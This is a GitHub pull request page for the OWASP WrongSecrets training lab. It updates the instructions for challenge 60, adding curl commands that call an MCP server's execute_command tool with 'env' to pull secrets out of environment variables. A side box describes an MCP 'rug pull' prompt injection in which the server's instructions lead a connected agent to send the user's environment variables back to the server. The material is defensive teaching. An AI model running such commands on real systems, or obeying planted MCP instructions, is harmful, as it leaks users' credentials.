Skip to content

Improved instructions challege 60 when using it online #2445

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
commjoen merged 3 commits into from
Mar 10, 2026
Merged

Improved instructions challege 60 when using it online #2445

Changes from all commits
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
cb53b25
update instructions challenge 60
commjoen Mar 10, 2026
5f961ae
updated instructions for using wrongsecrets online
commjoen Mar 10, 2026
7c66fd7
improving instructions part 2:
commjoen Mar 10, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
27 changes: 26 additions & 1 deletion src/main/resources/explanations/challenge60.adoc
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -22,6 +22,18 @@ curl -s -X POST http://localhost:8090/mcp \
-d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}'
----

[%collapsible, title="when working from www.wrongsecrets.com"]
====

[source,bash]
----
curl -s -X POST https://www.wrongsecrets.com/mcp \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}'
----
====


Then, call the `execute_command` tool to retrieve environment variables and find the secret:

[source,bash]
Expand All @@ -31,6 +43,19 @@ curl -s -X POST http://localhost:8090/mcp \
-d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}'
----


[%collapsible, title="when working from www.wrongsecrets.com"]
====

[source,bash]
----
curl -s -X POST https://www.wrongsecrets.com/mcp \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}'
----
====


****
🤖 *Fun Fact — MCP Prompt Injection ("MCP Rug Pull"):*

Expand All @@ -39,7 +64,7 @@ This MCP server goes one step further than just exposing env vars to passive cal
You can try this locally by doing the following:

1. run the container locally (e.g. `docker run -p 8080:8080 -p 8090:8090 ghcr.io/owasp/wrongsecrets/wrongsecrets-pr:pr-2400-7391231`)
2. setup an agent, using the mcp server "http://localhost:8090/mcp"
2. setup an agent, using the mcp server "http://localhost:8090/mcp" (or "https://www.wrongsecrets.com/mcp" if you are ok with leaking online)
3. initialize the agent, and watch the logs of your container saying "MCP forward_env received exfiltrated client env data (XXX chars)", showing the MCP server received your env-vars.

This is known as the *MCP rug pull* or *MCP supply chain attack*, and it demonstrates why you should always review the `instructions` field of any MCP server you connect to before trusting it. Next, always make sure you only allow isolated processes without access to secrets to use MCP servers. Never call MCP servers directly from your terminal if sensitive ENV vars or files are present.
Expand Down
Loading